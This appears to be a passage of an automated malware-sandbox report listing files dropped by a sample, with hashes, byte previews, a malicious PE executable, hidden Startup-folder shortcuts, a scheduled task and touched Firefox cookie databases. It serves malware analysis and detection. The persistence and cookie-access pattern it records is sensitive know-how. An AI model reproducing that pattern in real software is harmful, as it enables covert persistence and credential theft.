SHA-512:	29AE3171E86B695940A246D07B3057C394A7B57F009D7ADA393DA8104B4C487DB9F7ACD84FB3ED56802C7C9EE7E05AF18ADB8D74397A8E5F5F9B5D7AB27BD519
Malicious:	false
Preview:	L..................F.@.. ...$+.,....GEA..6..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.ImY.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VmY.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VmY.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VmY............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VmY............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............-m......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 13 18:39:29 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2683
Entropy (8bit):	3.983732039434614
Encrypted:	false
SSDEEP:	48:8u2d/OTfK8RuH2idAKZdA1duT+ehOuTbbiZUk5OjqehOuTbEy+yT+:8WP0T/TbxWOvTbEy7T
MD5:	B3C7572ACBDC0E793C942120D79A24F5
SHA1:	2F2F384A4D14BC53074B04C3540BD64446C94099
SHA-256:	70A7AF888702FD9D3923C24F2535875F28809C2AC7124C08BDBF079BF9244645
SHA-512:	D833639D9810F0590372244A43E9DDCA2CBACD018A360BD10CDC41E0FC29B01B22BC6C9EC276653FBEF1037BDF0CCC63AB031590D2F37219E83761EF8D55561A
Malicious:	false
Preview:	L..................F.@.. ...$+.,...../..6..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.ImY.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VmY.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VmY.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VmY............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VmY............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............-m......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\akdz.lnk

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Nov 13 18:41:06 2024, mtime=Wed Nov 13 18:43:13 2024, atime=Wed Nov 13 18:41:12 2024, length=9308672, window=hide
Category:	dropped
Size (bytes):	1151
Entropy (8bit):	4.894820276132296
Encrypted:	false
SSDEEP:	24:8hwfFk8pgJXSRegKH3tad0oe0q9UAehXe7S/RNqygm:8hwD1RAtaGoBKehumREyg
MD5:	E5B82363CC9FBE275E72F2AF8D9230F2
SHA1:	83AD5B556E8D5CBD39C9E20E88F89F7EB360CE3F
SHA-256:	60515EAEC2044260120F77B71EDCBA273A1B32448B4EC189FE7F155994904729
SHA-512:	CDC05879885DEBD36880A0F2C1A3B7AD7C3324BE9DC392847D75A17EC2679C4F6EA7E46EDDC2742D333EAA1AD606CD9555C8C2910F87C4B20A00BEAB1C91BFA7
Malicious:	false
Preview:	L..................F.... ...".}..6...X.F.6.....6............................:..DG..Yr?.D..U..k0.&...&...... M.....Q.B..6..m.G.6......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlmY.....B.....................Bdg.A.p.p.D.a.t.a...B.P.1.....mY,...Local.<......DWSlmY,.....V........................L.o.c.a.l.....N.1.....mYg...Temp..:......DWSlmYg.....\.....................?~&.T.e.m.p.....^.1.....mY$...100603~1..F......mY$.mY'..............................1.0.0.6.0.3.4.0.0.1.....T.2.....mY'. .mk.exe..>......mY$.mY'...............................m.k...e.x.e.......c...............-.......b............-m......C:\Users\user\AppData\Local\Temp\1006034001\mk.exe........\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.1.0.0.6.0.3.4.0.0.1.\.m.k...e.x.e.............:...........\|....I.J.H..K..:...`.......X.......216041...........hT..CrF.f4... ..~6.....,...W..hT..CrF.f4... ..~6.....,...W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dslm.lnk

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Nov 13 18:41:06 2024, mtime=Wed Nov 13 18:42:46 2024, atime=Wed Nov 13 18:41:12 2024, length=9308672, window=hide
Category:	dropped
Size (bytes):	1151
Entropy (8bit):	4.892534944730847
Encrypted:	false
SSDEEP:	24:840fFS8pgJXSRRgKHI0d0oe0q9UAehXe7S/RNqygm:840F1R20GoBKehumREyg
MD5:	B5FF4D30B2C8E02894F407D547512C49
SHA1:	82D908400C329330673EC36CC76D0F10B2EE81DB
SHA-256:	E1FD120453711076AC233A18647191D7D9FEC7DB3CF89222C1948A3CA30F31E8
SHA-512:	3D8B461781DBE21F3AFBBE447464241D9363ED03A37F8C32AEE52B1221752C53CF60AA5DA1B7C01C156F93FD54A53D4D80636350F84AEEE26AEAFA87419E5E50
Malicious:	false
Preview:	L..................F.... ...".}..6..$..6.6.....6............................:..DG..Yr?.D..U..k0.&...&...... M.....Q.B..6..NZ.8.6......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlmY.....B.....................Bdg.A.p.p.D.a.t.a...B.P.1.....mY,...Local.<......DWSlmY,.....V........................L.o.c.a.l.....N.1.....mYX...Temp..:......DWSlmYX.....\.....................h...T.e.m.p.....^.1.....mY$...100603~1..F......mY$.mY'..............................1.0.0.6.0.3.4.0.0.1.....T.2.....mY'. .mk.exe..>......mY$.mY'...............................m.k...e.x.e.......c...............-.......b............-m......C:\Users\user\AppData\Local\Temp\1006034001\mk.exe........\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.1.0.0.6.0.3.4.0.0.1.\.m.k...e.x.e.............:...........\|....I.J.H..K..:...`.......X.......216041...........hT..CrF.f4... ..~6.....,...W..hT..CrF.f4... ..~6.....,...W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kncs.lnk

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Nov 13 18:41:06 2024, mtime=Wed Nov 13 18:43:26 2024, atime=Wed Nov 13 18:41:12 2024, length=9308672, window=hide
Category:	dropped
Size (bytes):	1151
Entropy (8bit):	4.911534058380142
Encrypted:	false
SSDEEP:	24:8zK+fFo8pgJXSRfgKH2tad0oe0q9UAehXe7S/RNqygm:8m+T1R5GoBKehumREyg
MD5:	69BDC3942A0441E1A028A4605ADE7E1C
SHA1:	94CD3779615FDBC3B0AC0AC7AC512A7421CA437B
SHA-256:	4052603DC39393BEE8F743D2292ADA5F17E56238BA7E8298DC12D1CC5FE04523
SHA-512:	516725C72911D76C2183BE8DD35792C330360E11784AD7FA586509EEAC46A78B7E0CEA78139BB2ABF3FE7189B6A4725C65E12A415FF60E7B680AE148D60DB7F2
Malicious:	false
Preview:	L..................F.... ...".}..6..*..N.6.....6............................:..DG..Yr?.D..U..k0.&...&...... M.....Q.B..6..t.O.6......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlmY.....B.....................Bdg.A.p.p.D.a.t.a...B.P.1.....mY,...Local.<......DWSlmY,.....V........................L.o.c.a.l.....N.1.....mYn...Temp..:......DWSlmYn.....\.......................z.T.e.m.p.....^.1.....mY$...100603~1..F......mY$.mY'..............................1.0.0.6.0.3.4.0.0.1.....T.2.....mY'. .mk.exe..>......mY$.mY'...............................m.k...e.x.e.......c...............-.......b............-m......C:\Users\user\AppData\Local\Temp\1006034001\mk.exe........\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.1.0.0.6.0.3.4.0.0.1.\.m.k...e.x.e.............:...........\|....I.J.H..K..:...`.......X.......216041...........hT..CrF.f4... ..~6.....,...W..hT..CrF.f4... ..~6.....,...W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\prua.lnk

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Nov 13 18:41:06 2024, mtime=Wed Nov 13 18:41:13 2024, atime=Wed Nov 13 18:41:12 2024, length=9308672, window=hide
Category:	dropped
Size (bytes):	1151
Entropy (8bit):	4.900647200234087
Encrypted:	false
SSDEEP:	24:8pfFV8pgJFgzRs4gKHAgd0oe0q9UAehXe7S/RNqygm:8pk1R+gGoBKehumREyg
MD5:	265F81BB4BBAC82C468271060E436E64
SHA1:	36FD2DE9CC318695CEBE4BD36FE01DA8A4E230AC
SHA-256:	492B091986171BC136BFAA5A441423003E19638BC98161CE38BC9760A5EE2E84
SHA-512:	4120273C1F6988105EEB6314A81F35CC9FF76D88A18D7E88F1133D0C18A345BC82D39E19352C0E71432D7114CBFFFCF32F4246D663F613978E39FC0AC88CBE21
Malicious:	true
Preview:	L..................F.... ...".}..6..b.8..6.....6............................:..DG..Yr?.D..U..k0.&...&...... M.....Q.B..6...n...6......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlmY.....B.....................Bdg.A.p.p.D.a.t.a...B.P.1.....mY...Local.<......DWSlmY.....V......................C..L.o.c.a.l.....N.1.....mY(...Temp..:......DWSlmY(.....\.....................w.$.T.e.m.p.....^.1.....mY$...100603~1..F......mY$.mY'..............................1.0.0.6.0.3.4.0.0.1.....T.2.....mY'. .mk.exe..>......mY$.mY'...............................m.k...e.x.e.......c...............-.......b............-m......C:\Users\user\AppData\Local\Temp\1006034001\mk.exe........\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.1.0.0.6.0.3.4.0.0.1.\.m.k...e.x.e.............:...........\|....I.J.H..K..:...`.......X.......216041...........hT..CrF.f4... ..~6.....,...W..hT..CrF.f4... ..~6.....,...W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\syie.lnk

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Nov 13 18:41:06 2024, mtime=Wed Nov 13 18:43:39 2024, atime=Wed Nov 13 18:41:12 2024, length=9308672, window=hide
Category:	dropped
Size (bytes):	1151
Entropy (8bit):	4.903580243669174
Encrypted:	false
SSDEEP:	24:8G6fF58pgJXSREgKHkd0oe0q9UAehXe7S/RNqygm:8G6A1R/GoBKehumREyg
MD5:	5BC1E4C6A58EE6C3093067F98BC4AC61
SHA1:	03E8675FCB55606FB5D8D791A2DE8857FBF8F10E
SHA-256:	0CBD69AD8F4B8D131F66F17236057339674BCEFC46D9E7E56F4598C45FB13F5A
SHA-512:	FFC18E85C1AD095EACE5081F8FAF590790A459486DC005B0AF3B48A6497CD2562B14B7A4A8CA86C613746225CD1AD2D6A764C86FCC40A406BF96F314AE43AEB5
Malicious:	false
Preview:	L..................F.... ...".}..6...0.V.6.....6............................:..DG..Yr?.D..U..k0.&...&...... M.....Q.B..6..M.CW.6......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlmY.....B.....................Bdg.A.p.p.D.a.t.a...B.P.1.....mY,...Local.<......DWSlmY,.....V........................L.o.c.a.l.....N.1.....mYu...Temp..:......DWSlmYu.....\.....................y...T.e.m.p.....^.1.....mY$...100603~1..F......mY$.mY'..............................1.0.0.6.0.3.4.0.0.1.....T.2.....mY'. .mk.exe..>......mY$.mY'...............................m.k...e.x.e.......c...............-.......b............-m......C:\Users\user\AppData\Local\Temp\1006034001\mk.exe........\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.1.0.0.6.0.3.4.0.0.1.\.m.k...e.x.e.............:...........\|....I.J.H..K..:...`.......X.......216041...........hT..CrF.f4... ..~6.....,...W..hT..CrF.f4... ..~6.....,...W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tytb.lnk

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Nov 13 18:41:06 2024, mtime=Wed Nov 13 18:43:00 2024, atime=Wed Nov 13 18:41:12 2024, length=9308672, window=hide
Category:	dropped
Size (bytes):	1151
Entropy (8bit):	4.90540988876395
Encrypted:	false
SSDEEP:	24:8zmfFi8pgJXSRQgKHfIad0oe0q9UAehXe7S/RNqygm:8SB1RGGoBKehumREyg
MD5:	B75396DECFC8C7420B0FEEDB1A5767BC
SHA1:	BB90EC801D8B12AB483B1B0F15E260960728982B
SHA-256:	DF1561C7913E307C7420861A5171E2F3C904B521722011B428C022D88AB62F3B
SHA-512:	6973DB797862E8919642D06E726A3DFAEACCE04C5A95677EFE5D01AAC877F6AF7B42D23908B0BC96C935EBD935E2EBE387B3ABA35C13549E6D894DABDCAEFD13
Malicious:	false
Preview:	L..................F.... ...".}..6.....>.6.....6............................:..DG..Yr?.D..U..k0.&...&...... M.....Q.B..6...6.?.6......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlmY.....B.....................Bdg.A.p.p.D.a.t.a...B.P.1.....mY,...Local.<......DWSlmY,.....V........................L.o.c.a.l.....N.1.....mYa...Temp..:......DWSlmYa.....\.....................=...T.e.m.p.....^.1.....mY$...100603~1..F......mY$.mY'..............................1.0.0.6.0.3.4.0.0.1.....T.2.....mY'. .mk.exe..>......mY$.mY'...............................m.k...e.x.e.......c...............-.......b............-m......C:\Users\user\AppData\Local\Temp\1006034001\mk.exe........\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.1.0.0.6.0.3.4.0.0.1.\.m.k...e.x.e.............:...........\|....I.J.H..K..:...`.......X.......216041...........hT..CrF.f4... ..~6.....,...W..hT..CrF.f4... ..~6.....,...W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xsap.lnk

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Nov 13 18:41:06 2024, mtime=Wed Nov 13 18:43:52 2024, atime=Wed Nov 13 18:41:12 2024, length=9308672, window=hide
Category:	dropped
Size (bytes):	1151
Entropy (8bit):	4.90212096814892
Encrypted:	false
SSDEEP:	24:8FfF88pgJXSRigKHYed0oe0q9UAehXe7S/RNqygm:8Fj1R1eGoBKehumREyg
MD5:	BC9EBE39B335454640D69695158DC767
SHA1:	930D85C487902CF0A8606B0030FBEA30948EDBA0
SHA-256:	A4675BD501C3D60A13F25AA39F4A8C8FDC5F5D06868F37F1A2BBE6B12B37C5A5
SHA-512:	7D5C5FBD44B55A62E4512F14DEC549651E1458B754157F8C817B8E8793767EAF8A93E4A2AE32993292EB4814A0847EBC42CE19B2EFFAB5ACEDBF87D5726F9DDC
Malicious:	false
Preview:	L..................F.... ...".}..6...c^.6.....6............................:..DG..Yr?.D..U..k0.&...&...... M.....Q.B..6..U.?_.6......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlmY.....B.....................Bdg.A.p.p.D.a.t.a...B.P.1.....mY,...Local.<......DWSlmY,.....V........................L.o.c.a.l.....N.1.....mY{...Temp..:......DWSlmY{.....\.....................s.D.T.e.m.p.....^.1.....mY$...100603~1..F......mY$.mY'..............................1.0.0.6.0.3.4.0.0.1.....T.2.....mY'. .mk.exe..>......mY$.mY'...............................m.k...e.x.e.......c...............-.......b............-m......C:\Users\user\AppData\Local\Temp\1006034001\mk.exe........\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.1.0.0.6.0.3.4.0.0.1.\.m.k...e.x.e.............:...........\|....I.J.H..K..:...`.......X.......216041...........hT..CrF.f4... ..~6.....,...W..hT..CrF.f4... ..~6.....,...W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yiuq.lnk

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Nov 13 18:41:06 2024, mtime=Wed Nov 13 18:42:12 2024, atime=Wed Nov 13 18:41:12 2024, length=9308672, window=hide
Category:	dropped
Size (bytes):	1151
Entropy (8bit):	4.901789179055223
Encrypted:	false
SSDEEP:	24:8DfFu8pgJXSR+gKH3d0oe0q9UAehXe7S/RNqygm:8DJ1RGGoBKehumREyg
MD5:	00118419D45DB232133D56E13C175A3B
SHA1:	F37EA57DA52748B9A8F1C72765DE0CBCBBE06536
SHA-256:	80DCDA543550BB4443F879061ACF66ACC1819E21BE8D9748A03DE8463C2E4139
SHA-512:	CE6F646636C76DC97D4EFA974346D10ECF3EC334E117E5CD9F5556E1630DB609B7980DC8DF55B65321CE60ACD296BD7E17E7498A07589B20691C5AC0BE61278A
Malicious:	false
Preview:	L..................F.... ...".}..6....\".6.....6............................:..DG..Yr?.D..U..k0.&...&...... M.....Q.B..6..O.3#.6......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlmY.....B.....................Bdg.A.p.p.D.a.t.a...B.P.1.....mY,...Local.<......DWSlmY,.....V........................L.o.c.a.l.....N.1.....mYG...Temp..:......DWSlmYG.....\.....................r...T.e.m.p.....^.1.....mY$...100603~1..F......mY$.mY'..............................1.0.0.6.0.3.4.0.0.1.....T.2.....mY'. .mk.exe..>......mY$.mY'...............................m.k...e.x.e.......c...............-.......b............-m......C:\Users\user\AppData\Local\Temp\1006034001\mk.exe........\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.1.0.0.6.0.3.4.0.0.1.\.m.k...e.x.e.............:...........\|....I.J.H..K..:...`.......X.......216041...........hT..CrF.f4... ..~6.....,...W..hT..CrF.f4... ..~6.....,...W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zzvy.lnk

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Nov 13 18:41:06 2024, mtime=Wed Nov 13 18:42:33 2024, atime=Wed Nov 13 18:41:12 2024, length=9308672, window=hide
Category:	dropped
Size (bytes):	1151
Entropy (8bit):	4.906378301516985
Encrypted:	false
SSDEEP:	24:87fF/8pgJXSRzgKHXd0oe0q9UAehXe7S/RNqygm:87S1RrGoBKehumREyg
MD5:	0BAC103A117978227FEBF72870ED3BD7
SHA1:	D299F156B624436F4CD8CD9D02F7BE6D37A00FB1
SHA-256:	2CE864DE55BAAA9210BE7E9F556B24C587240EDBB49B9DFE2EC6CF6634E7A1EE
SHA-512:	958223E1246E905AE89D3D227E75126D301F41158AA2C8D92E5D60A334B267EC2FFE4623EB3AAF1F917F7E44CAF35B80B71D386ED7CCACB354E4E637608B710F
Malicious:	false
Preview:	L..................F.... ...".}..6..4d%/.6.....6............................:..DG..Yr?.D..U..k0.&...&...... M.....Q.B..6...C*0.6......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlmY.....B.....................Bdg.A.p.p.D.a.t.a...B.P.1.....mY,...Local.<......DWSlmY,.....V........................L.o.c.a.l.....N.1.....mYR...Temp..:......DWSlmYR.....\.........................T.e.m.p.....^.1.....mY$...100603~1..F......mY$.mY'..............................1.0.0.6.0.3.4.0.0.1.....T.2.....mY'. .mk.exe..>......mY$.mY'...............................m.k...e.x.e.......c...............-.......b............-m......C:\Users\user\AppData\Local\Temp\1006034001\mk.exe........\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.1.0.0.6.0.3.4.0.0.1.\.m.k...e.x.e.............:...........\|....I.J.H..K..:...`.......X.......216041...........hT..CrF.f4... ..~6.....,...W..hT..CrF.f4... ..~6.....,...W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\DocumentsKECBGCGCGI.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3278336
Entropy (8bit):	6.678739299621272
Encrypted:	false
SSDEEP:	49152:Vy/iRjA6Y2rjUl0ly9hL/qapGabr99KnYmcdRW/So5x:Vy/Kcv2rIl0l0hkq+Y/vqx
MD5:	0A25084685B54B88100D89D2BF1FB4DE
SHA1:	5A67610F98D718816FC87DDB0C07BEC46E0FD272
SHA-256:	FEBBB41378C5839064C6449C9B827D5F86CD5D3D162798E30A365C50F217A1FD
SHA-512:	D9DD3E961B48EF0989D65D73B4726E15F5773D4075527A1FDC7E4A8A1BD94A0BB8317DFE039F15D0E97642E78D0388BFC19A25098D416A2E1856CE522DB5A2D1
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................2...........@..........................@2.....8.2...@.................................W...k.............................1.............................d.1..................................................... . ............................@....rsrc...............................@....idata ............................@...suzdiwdy.P+......L+.................@...otlnilqb......2.......1.............@....taggant.0....2.."....1.............@...........................................................................................................................................................................................................................................................

C:\Windows\Tasks\skotes.job

Download File

Process:	C:\Users\user\DocumentsKECBGCGCGI.exe
File Type:	data
Category:	dropped
Size (bytes):	290
Entropy (8bit):	3.4334307891203686
Encrypted:	false
SSDEEP:	6:Xo5g9DZTX55ZsUEZ+lX1CGdKUe6tFXqYEp5t/uy0lB4yldt0:45g9DZTuQ1CGAFifXVB4mt0
MD5:	94887D109CABC65E9FBF2F2ECE2BC663
SHA1:	7918270E9F6E19FAF08F8A5C75E96455CCDD2636
SHA-256:	BD2BBC36CD11AC5E0B54656F67EC83C1D9B1DFCA1E87CFE6EC02C7ABF09A8D03
SHA-512:	5C54DE6D7580142CBF07B9CC9E93612117DD7ADDCF1B567332BF4F613B9F36F925FD373B9F3E9CA918ED31ECE75A3F40BF75D7FB7AE7BC9DFD9AF98E2CA3D780
Malicious:	false
Preview:	......tx$.M....E...F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0.................).@3P.........................

Chrome Cache Entry: 560

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (789)
Category:	downloaded
Size (bytes):	794
Entropy (8bit):	5.150017242097713
Encrypted:	false
SSDEEP:	24:e8NAzsNBHslgT9lCuABuoB7HHHHHHHYqmffffffo:DDNKlgZ01BuSEqmffffffo
MD5:	8E03B7DE5853A81597CE4A6300B76674
SHA1:	48D4E8D3BD3814E21F9749E629FD32FE03626371
SHA-256:	C4E8E212F9CED9A5AF56A72F3DC7C8647BCE3021D394D748D4A201BFC386BDEF
SHA-512:	756564B6C325317E94BE33655AA5AAFBBAD85C8DD5B3825057907C7880726FBA09B36E7EBB8BAC2464B2BD05DFAEDF091E47BAFF86B4BF6FC95428C9C7822C46
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["verizon fios internet outages","black panther 3 denzel washington","minnesota timberwolves vs trail blazers","agent bootcamp monopoly go rewards","cold front texas","november full moon","hannaford cybersecurity","hello kitty guitars"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]

Chrome Cache Entry: 561

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	29
Entropy (8bit):	3.9353986674667634
Encrypted:	false
SSDEEP:	3:VQAOx/1n:VQAOd1n
MD5:	6FED308183D5DFC421602548615204AF
SHA1:	0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
SHA-256:	4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
SHA-512:	A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
Malicious:	false
URL:	https://www.google.com/async/newtab_promos
Preview:	)]}'.{"update":{"promos":{}}}
